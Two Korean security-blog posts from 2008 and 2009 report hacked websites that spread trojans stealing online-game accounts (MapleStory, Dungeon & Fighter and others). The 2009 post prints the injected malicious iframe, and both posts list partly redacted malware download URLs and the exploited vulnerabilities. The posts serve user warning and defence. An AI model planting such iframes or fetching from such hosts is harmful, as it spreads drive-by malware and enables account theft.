태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'메이플스토리'에 해당되는 글 2건

  1. 2009.05.23 [Hacked] 온라인 게임 리뷰 사이트 악성코드 유포
  2. 2008.03.03 3.1절은 악성코드 뿌리는 날?
신종악성코드정보2009.05.23 14:51


메인 페이지에 악의적인 아이프레임이 삽입되어 있다.

<iframe src=http://203.(생략).117/index.htm width=100 height=0></iframe></a>
   

index.htm 파일에는 Multiple Exploit Code 가 포함되어 있다.


일부 PC에서는 다음과 같은 오류창이 나타날 수 있다.


- old.js
- flash.htm
- IE7.htm
- 06014.htm
- real.htm
- new1.htm
- ac.htm

Exploit Code 들에 의해서 중국사이트에 숨겨져 있는 svchost.exe 파일이 설치시도 된다.

http://down.(생략).org/svchost.exe

svchost.exe 파일이 실행되면 다음과 같은 파일이 생성된다.

C:\Windows\System32\korean.dll
C:\Windows\System32\msdconf.exe

korean.dll 파일은 다음과 같은 온라인 게임의 주요 모듈 사용자의 정보 탈취를 시도한다.

MAPLESTORY.EXE
DNF.EXE
GAMELAUNCHER.EXE



Posted by viruslab
보안관련소식2008.03.03 09:43


지난 주는 3.1절이 포함되어 있는 주말이었는데, 토요일과 일요일부터 국내의 여러 웹 사이트가 해킹되어 새로운 악성코드를 유포하는 경유지로 악용되고 있다. 물론 평상 시에도 다량으로 뿌리는 경우가 많다.

월요일 오전까지도 지속적으로 유포되고 있으니 조심해야 겠다.

대표적으로 다음과 같은 취약점을 이용하고 있다.

MS06-014
Real Player Exploit
JetAudio Exploit

http://www.[제거]/fileupload/1313.exe
http://test.[제거]/dog.exe
http://121.[제거]130/H.EXE
http://www.[제거]/pic/ok.hlp
http://211.110.[제거]/smtpsnap.jpg
http://unsu[제거]/6/6/dm.exe
http://www.[제거]/Gonggu/Image/graph.exe

현재 가장 많은 곳에서 배포되는 것으로 보여지는 파일은 1313.exe 로 국내 유명 온라인 게임 사용자의 계정 탈취용 트로이목마로 확인되었다.

[대상 게임]
바람의 나라
메이플 스토리
던전 앤 파이터
한게임 등

사용자들은 최신 보안패치를 설치하면 해당 Exploit Code 로 부터 안전할 수 있으며, 최신 백신프로그램을 유지하고 실시간 감시를 활성화 해 두는 것이 필요하다.
Posted by viruslab